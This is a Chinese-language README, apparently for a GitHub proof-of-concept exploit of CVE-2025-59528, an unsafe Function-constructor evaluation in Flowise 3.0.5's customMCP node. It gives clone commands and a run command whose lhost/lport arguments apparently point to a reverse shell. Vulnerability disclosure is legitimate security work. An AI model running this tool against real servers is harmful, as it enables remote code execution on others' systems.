
CVE-2025-59528 Proof of Concept
本仓库包含了证明 CVE-2025-59528 在 Flowise v3.0.5 中存在的概念验证代码。
该漏洞存在于 customMCP 节点中,用户提供的 mcpServerConfig 输入在处理时,会通过 Function 构造函数进行不安全求值,从而导致 JavaScript 代码执行。
| 受影响 | 修复版本 |
|---|---|
| 3.0.5 | 3.0.6 |
经过身份验证的用户可能能够在服务器上执行任意 JavaScript,进而可能导致远程代码执行。
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
python3 CVE-2025-59528.py -t "<url>" --api-key <api_key> --lhost <ip> --lport <port>

本工具仅供教育和研究目的使用。创作者不对因使用该工具而导致的任何滥用或损害承担责任。